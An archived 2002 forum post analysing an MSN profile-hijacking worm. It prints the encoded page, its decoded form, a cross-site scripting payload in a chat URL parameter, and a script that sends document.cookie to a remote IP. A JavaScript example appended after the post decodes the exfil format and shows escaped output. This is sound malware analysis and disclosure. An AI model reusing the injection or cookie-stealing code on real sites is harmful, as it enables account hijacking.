BetaONE will rise again!


 
11th Oct 02, 03:52 AM
FreeUS
Senior Member
Join Date: Nov 2001
Posts: 634
Malicious porn sites use JavaScript to change your profile. It's an all-exclusive 'MSN Member' worm.

First impression
I didn't believe this. Your profile is changed just by visiting a site? But (again) apparently this is very true. If you (by accident) view a profile today (or one of the following days) that leads to a site like http://honeyhome.hotpage.net/, you'll be sorry later.

How it works:
Let's say that the user with the email doesnt-excist@hotmail.com is infected. We are visiting his profile on a URL like this: 'http://members.msn.com/doesnt-excist@hotmail.com'.
The profile is filled in with some random info... nothing special. Nothing interesting. Oh, there is a link to his homepage.

The badass site is http://honeyhome.hotpage.net/. It will attempt to change your profile.
(some parts of the code are altered for security reasons)
Let's take a look at the source of that site:
Quote:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"><HTML><HEAD><TITLE>Untitled Document</TITLE><script language=JScript.Encode>#@~^AgQAAA==@#@&\CMP:+6DP{ E]
2Z4YsVYfA]!GY!z]&;4nl9]22Y!9YZbY&;OkDVnY22jUObYs+9Yy!9Km!:+
YufZJYrY^+YfA]!GY!z]&;hnYm]y!4YO2 +5Eb-]2fY+yZWUO?xOO:za+
Yy u !1WO+YY&G]++D+6D&tD:Vuf$]y!1tCDdnD]ffbdW %0XOOFY+y]

f2uTG]Tz]2Zz4+m[]22Y!G]T)u!fuTbu&Z6.C:?/?YY T.Khd]29]y 11O,,Y
+;FY yYy!WMls+4KD9nDu&9]y H6u *u+!(WD9n.]2fu +!Y+y]+!6.ls+d2

mmkULu&9]y+Z]+y]y!mKVkY&G]+ C]++u&2u+!u!fuT)]y!u T]+Tu T]yT]
y!Yf;0DCh?]+!Cs+Y2fu *slbUsMlh+u +Yy!/M^]2f]y+hXalT+ tOhu
+]23]ZfYTz]!9YZbY ZYy!Yy!u !u ZY Z]fZ6DCh?] ZUls+]29Y y4KYOW
hoMlh+yY y]+TkmDGs^kUoufG]+y1}] y]yTxKDn/bynYy!/M^]2f]y+4YDw
u&)z&^4lORsdxcmGhJkx-rD+ :kUS]fwt?6xbm0Y&Gb)bzbY++qx7rYmYkKU/

W9+u&9F+fW*?GR1]yvhG9+]f9y]+v4nXjd?Dgl:?]29]y*fZkm.raY]yX Z/D
1Y+*2f4YOwY+l&)zJ+FFRq1lR&{ 2c&Y?dDR%kwu *22u+*2AY l&/Yy**1Y
l sk^.kaYu X&3Yy Y&AY!G]T)u !Y+Z]+!u+Z]f;z6Dls+knYu&3]ZfYTz]!

GY!z]!GYTbu&;xG0.Cs+d]23]2Z8G9X]+T(o^W^GM]fG]y ]y&woswso]y Yf
A]!GY!z]!GYTbu&;z8W[zu&3]2/zWW.m:+dY22Y!GYZbY2ZJtYsVuf2u!9

]ZbEI@#@&@#@&WEmYbGUPG+;W[+cb,~\m.Pg+AP?6YI~g+AK?aDPx,E
+/1lan`:+aY*i~[KmEsnxDRhMrO+v1?hP+aO*iNPGnZKNnc*i@#@&bx4B
AA==^#~@</SCRIPT>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
<body bgcolor="red">
<iFRAME name=mainFrame src="mypage.htm">

<iFRAME name=bottomFrame2 src="http://chat.msn.com/invite.msnw?hexnick=AAAAA&amp;InvitationCode=123456789&amp;mode=2&amp;hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E" noResize scrolling=no>
</body>
</HTML>

They encoded the script. Thank god for decoders. The decoded output is this:
Quote:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"><HTML><HEAD><TITLE>Untitled Document</TITLE>

<script language=JScript.Encode>var Text ="%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3EUntitled%20Document%3C/title%3E%0D%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%0D%0A%3C/head%3E%0D%0A%0D%0A%3Cframeset%20rows%3D%2299999%2C1%22%20frameborder%3D%22NO%22%20border%3D%220%22%20framespacing%3D%220%22%20cols%3D%22*%22%3E%20%0D%0A%20%20%20%20%20%20%3Cframe%20name%3D%22mainFrame%22%20src%3D%22mypage.htm%22%3E%0D%0A%0D%0A%20%20%20%20%20%20%3Cframe%20name%3D%22bottomFrame2%22%20scrolling%3D%22NO%22%20noresize%20src%3D%22http%3A//chat.msn.com/invite.msnw%3Fhexnick%3DAAAAA%26InvitationCode%3D123456789%26mode%3D2%26hexUserName%3D%253Cscript%2520src%253Dhttp%253A//217.195.37.34/test.jsp%253E%253B%253C%255c%252Fscript%253E%22%3E%0D%0A%20%20%20%20%3C/frameset%3E%0D%0A%0D%0A%0D%0A%3Cnoframes%3E%3Cbody%20bgcolor%3D%22%23FFFFFF%22%3E%0D%0A%0D%0A%3C/body%3E%3C/noframes%3E%0D%0A%3C/html%3E%0D%0A";

function DeCode() { var NewText; NewText = unescape(Text); document.write(NewText);} DeCode();
</SCRIPT>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
<body bgcolor="red">

<iFRAME name=mainFrame src="mypage.htm">

<iFRAME name=bottomFrame2 src="http://chat.msn.com/invite.msnw?hexnick=AAAAA&amp;InvitationCode=123456789&amp;mode=2&amp;hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E" noResize scrolling=no>
</body>
</HTML>

So the function they are trying to hide is something like this:
Quote:

<script language=JScript.Encode>var Text ="%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3EUntitled%20Document%3C/title%3E%0D%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%0D%0A%3C/head%3E%0D%0A%0D%0A%3Cframeset%20rows%3D%2299999%2C1%22%20frameborder%3D%22NO%22%20border%3D%220%22%20framespacing%3D%220%22%20cols%3D%22*%22%3E%20%0D%0A%20%20%20%20%20%20%3Cframe%20name%3D%22mainFrame%22%20src%3D%22mypage.htm%22%3E%0D%0A%0D%0A%20%20%20%20%20%20%3Cframe%20name%3D%22bottomFrame2%22%20scrolling%3D%22NO%22%20noresize%20src%3D%22http%3A//chat.msn.com/invite.msnw%3Fhexnick%3DAAAAA%26InvitationCode%3D123456789%26mode%3D2%26hexUserName%3D%253Cscript%2520src%253Dhttp%253A//217.195.37.34/test.jsp%253E%253B%253C%255c%252Fscript%253E%22%3E%0D%0A%20%20%20%20%3C/frameset%3E%0D%0A%0D%0A%0D%0A%3Cnoframes%3E%3Cbody%20bgcolor%3D%22%23FFFFFF%22%3E%0D%0A%0D%0A%3C/body%3E%3C/noframes%3E%0D%0A%3C/html%3E%0D%0A";
function DeCode()
{
    var NewText;
    NewText = unescape(Text);
    document.write(NewText);
}
DeCode();
</SCRIPT>

If we put the same code without the dirty %, it comes out as:
Quote:

<html><head><title>Untitled Document</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<frameset rows="99999,1" frameborder="NO" border="0" framespacing="0" cols="*">
<frame name="mainFrame" src="mypage.htm">
<frame name="bottomFrame2" scrolling="NO" noresize src="http://chat.msn.com/invite.msnw?hexnick=AAAAA&InvitationCode=123456789&mode=2&hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E">
</frameset>
<noframes><body bgcolor="#FFFFFF">
</body></noframes>
</html>
I know that you saw it. That src of the URL seems too strange.
Quote:

http://chat.msn.com/invite.msnw?hexn...tionCode=123456789&mode=2&hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E
It steals your MSN cookies.
Quote:

http://chat.msn.com/invite.msnw
hexnick=AAAAA
InvitationCode=123456789
mode=2
hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E
So it is the variable 'hexUserName' that is causing the pain.

Decoded, it's:
Quote:

<script>http://217.195.37.34/test.jsp</script>
Let's take a look at the contents of that file.
Quote:

function packen(quasi) {
var test;
test = '';
for(var i = 0; i <= quasi.length - 1; i++)
test = test + quasi.charCodeAt(i) + ',';
return(test);
}
location.href="http://217.195.37.34:311/test.php?cod=" + packen(document.cookie);
This script takes a string as a parameter and then, char by char, converts it into ASCII codes, separated with a comma.

The string it takes is your cookies, and it sends them in number format to a PHP script on port 311 of that same server.

I captured the output of the script. (I changed most of the numbers so that you guys don't steal my account, so don't even bother...)
Quote:

http://217.195.37.34:311/test.php?co...,85,73,68,61,
68,67,56,66,69,54,56,55,48,56,48,65,
52,51,52,66,57,65,50,55,53,55,53,68,67,
70,69,56,57,49,54,67,59,32,83,73,84,69,
83,69,82,86,69,82,61,73,68,61,
85,74,66,62,63,64,54,66,49,54,56,54,
47,57,49,65,52,51,52,63,52,66,52,56,55
56,54,68,67,70,69,58,57,49,54,67,59,34,
108,97,120,103,63,110,104,45,98,121,59,
33,108,124,61,77,83,70,84
The PHP script on port 311 gets the cookies via ASCII.
At first sight I saw this was ASCII code... If we decode this, as the JavaScript coded it, we get the following: (again, I altered the things, so don't bother...)
Quote:

MC1=V=2&GUID=DC8434B9BE68080AA27598775DCFE16C; SITESERVER=ID=UID=DC9A275E68B434DCFE8B87080A75916C ;
It is obvious and clear that with these combined values one can change an MSN Member Profile. Possibly you can change more things. But let's not hope for the worst.

Aftermath
It seems the server at this port (311) went down on 8-10-2002 9:45:08 GMT. It looks as if it is hosted by Tiscali Germany. I will contact them shortly.

This worm clearly shows 2 things.
1. Porn sites and more are going very low to get those few extra hits.
2. Everything without previously reported exploits or flaws made by Microsoft should be considered unsafe or untested...

Microsoft, fix this:
In http://chat.msn.com/invite.msnw the value hexUserName should not contain %'s.

This 'hack' was reported by GroundZero and rachel. I found it interesting to investigate it further. Thank you for bringing my attention to it.

UnderDOC underdoc@msnfanatic.com



Last edited by Sephiroth at Oct 10 2002, 10:39 PM
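As an added example (not part of the original post or of the 2002 site's code), two defender-side pieces of this write-up in JavaScript: reversing the charcode exfil format test.jsp used so a captured request can be read, and the unencoded reflection of hexUserName beside a version that validates and HTML-escapes it. The hex-only rule, the sample request and the renderInvite* functions are assumptions, not MSN's real code.

```javascript
// Added example, not code from the original post: defender-side helpers
// for the two mechanisms described above. All sample values are constructed.

// 1. Reverse the exfil format. test.jsp sent document.cookie to test.php as
//    a comma-separated list of character codes in "cod"; this turns a
//    captured request URL back into cookie text an analyst can read.
function decodeCodQuery(url) {
  const m = /[?&]cod=([0-9,]*)/.exec(url);
  if (!m) return null;
  return m[1]
    .split(',')
    .filter((s) => s.length > 0)              // packen() leaves a trailing comma
    .map((s) => String.fromCharCode(Number(s)))
    .join('');
}

// 2. The injection point. invite.msnw reflected hexUserName into its page
//    unencoded; renderInviteUnsafe mirrors that, renderInviteSafe shows the
//    fix the post asks for. The hex-only rule is an assumption taken from
//    the parameter name, not from the real service.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderInviteUnsafe(hexUserName) {
  return '<p>Invited by ' + hexUserName + '</p>';
}

function renderInviteSafe(hexUserName) {
  if (!/^[0-9A-Fa-f]+$/.test(hexUserName)) {
    throw new Error('hexUserName must be hexadecimal');
  }
  return '<p>Invited by ' + escapeHtml(hexUserName) + '</p>';
}

// Constructed sample: the hexUserName value from the post, percent-decoded
// once, the way the server would before reflecting it.
const PAYLOAD = decodeURIComponent(
  '%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E');

// Constructed sample exfil request (shortened; not the captured one).
const SAMPLE_EXFIL = 'http://217.195.37.34:311/test.php?cod=85,73,68,61,77,83,70,84,';

console.log(decodeCodQuery(SAMPLE_EXFIL));  // UID=MSFT
console.log(renderInviteUnsafe(PAYLOAD));   // the script tag lands in the page
console.log(renderInviteSafe('AAAAA'));     // <p>Invited by AAAAA</p>
```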